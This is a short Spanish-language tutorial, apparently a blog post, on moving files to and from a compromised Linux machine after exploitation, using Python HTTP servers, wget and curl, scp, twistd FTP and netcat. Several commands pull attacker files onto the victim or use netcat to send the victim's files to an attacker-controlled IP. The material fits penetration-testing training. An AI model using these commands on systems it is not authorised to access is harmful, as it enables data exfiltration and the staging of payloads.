FallenAngel666

FallenAngel666

red team for ..... ,
HackTheBox ,
linux enthusiast

Subida y Bajada de archivos (Post explotacion)

buenas. hoy vengo a enseñar los metodos de post explotacion para subir y bajar archivos dependiendo de la conexion que tengamos con la maquina victima

Subir archivos a la victima

HTTP server

con este metodo habriremos un servidor de python en el directorio donde esta el archivo que queremos subir.

comando maquina atacante:


python -m SimpleHTTPServer 80

comandos para la maquina victima:

wget http://<Tu_IP>/<elarchivo>

o

curl -o FiletoTransfer http://<tu_IP>/<elarchivo>

SCP

ESTE METODO SOLO SERA VALIDO SI LA MAQUINA OBJETIVO TIENE SSH Y DISPONEMOS DE LAS CREDENCIALES.

en este solo necesitamos un comando:


scp FiletoTransfer <usuario>@<IP>:<archivo>

FTP

Montaremos un ftp temporal(podriamos utilizar un ftp convencional) utilizando la utilidad twistd para asi acceder desde la víctima y descargar el archivo

el comando de la maquina atacante:


twistd -n ftp -r .

maquina victima:


wget ftp://<IP>:<puerto_a_elegir>/<archivo>

netcat

podemos usar netcat para poder pasar archivos. casi todas las maquinas linux lo traen pre instalado entonces podemos usarlo

primero tenemos que ejecutar el comando en la maquina victima


nc -lvp <port_a_elegir> > FiletoTransfer

y despues la maquina atacante


	
nc <IP> <Port_a_elegit> -w 3 < <archivo>

Bajar archivos de la víctima

Netcat

se pude utilizar netcat a la inversa para hace este procedimiento, pero hay que tener en cuenta los permisos que tenga el usuario sobre el archivo

Comando máquina atacante:

	
nc -lvp <Puerto_a_elegir> > FiletoDownload

Comando máquina víctima:

	
nc <IP> <Puerto_a_elegir> -w 3 < <archivo>

Server HTTP

es basicamente lo mismo que e hemos echo para subir archivos pero al reves.

tambien, hay que tener en cuenta que la maquina tenga python y los permisos que tenga

Comando máquina víctima:


python -m SimpleHTTPServer 8080

Comando máquina atacante:


wget http://<IP>:8080/<archivo>

SCP

Este metodo solo será valido si la máquina objetivo tiene ssh y disponemos de las credenciales. Utilizaremos la utilidad scp para transferir el archivo de la máquina víctima a la nuestra.

Comando máquina atacante:


scp tester@<IP>:<archivo> .

conclusion

estas son algunas de las mas utilizadas, seguro hay mas. pronto subire este articulo pero para windows. adios